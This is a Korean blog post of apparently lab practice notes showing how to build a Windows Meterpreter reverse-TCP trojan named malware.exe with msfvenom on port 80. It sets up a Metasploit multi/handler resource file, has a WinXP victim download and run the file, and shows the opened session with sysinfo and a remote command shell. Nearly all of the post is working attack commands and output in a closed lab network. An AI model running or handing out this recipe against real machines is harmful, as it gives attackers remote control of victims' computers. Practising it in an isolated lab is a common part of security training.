Linux/보안장비 운용

malware.exe 포트 변경하기

GGkeeper 2022. 3. 2. 15:46

실습> malware.exe 포트 변경하기

4444 -> 80 번 포트로 변경하고 테스트를 진행한다.

1. 악성코드 생성
포트를 80으로 설정하고 malware.exe를 생성한다.
Attacker# msfvenom -p windows/meterpreter/reverse_tcp \
lhost=192.168.108.200 lport=80 -f exe -o /var/www/html/malware.exe

2. malware.rc 파일 생성
Attacker# vi malware.rc 
info multi/handler
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost 192.168.108.200
set lport 80
exploit 

3. 악성코드 다운로드
WinXP에서 malware.exe를 다운로드 받아서 바탕화면에 저장한다.
http://192.168.108.200/malware.exe

4. 웹서버 중지
msfconsole 에서 80번 포트로 오픈하므로 웹서버를 중지한다.
Attacker# /etc/init.d/apache2 stop

5. malware.rc 실행
victim이 들어올 수 있도록 80번 포트로 대기한다.
Attacker#  msfconsole -r malware.rc 
  :
  :(생략)
resource (malware.rc)> set lhost 192.168.108.200
lhost => 192.168.108.200
resource (malware.rc)> set lport 80
lport => 80
resource (malware.rc)> exploit
[*] Started reverse TCP handler on 192.168.108.200:80 

6. 악성코드 실행
WinXP가 malware.exe를 실행하면 공격자에게 리버스 커넥션으로 연결되서 공격자에게 조종 당하는 좀비PC가 된다. 

80번 포트로 공격자에게 연결되는 것을 확인할 수 있다.
[*] Sending stage (175174 bytes) to 192.168.108.150
[*] Meterpreter session 1 opened (192.168.108.200:80 -> 192.168.108.150:1424 ) at 2022-02-24 07:09:24 -0500

meterpreter > sysinfo
Computer        : VICTIM_WINXP
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 1728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\ksw\바탕 화면>exit

'Linux > 보안장비 운용' 카테고리의 다른 글

DNS 서버 설정  (0) 2022.03.02
시간 설정 & 로그인 시간 변경하기  (0) 2022.03.02
msfvenom 을 이용한 악성코드 작성하기  (0) 2022.03.02
내부망 Win7 설정  (0) 2022.03.02
내부망 WinXP 설정하기  (0) 2022.03.02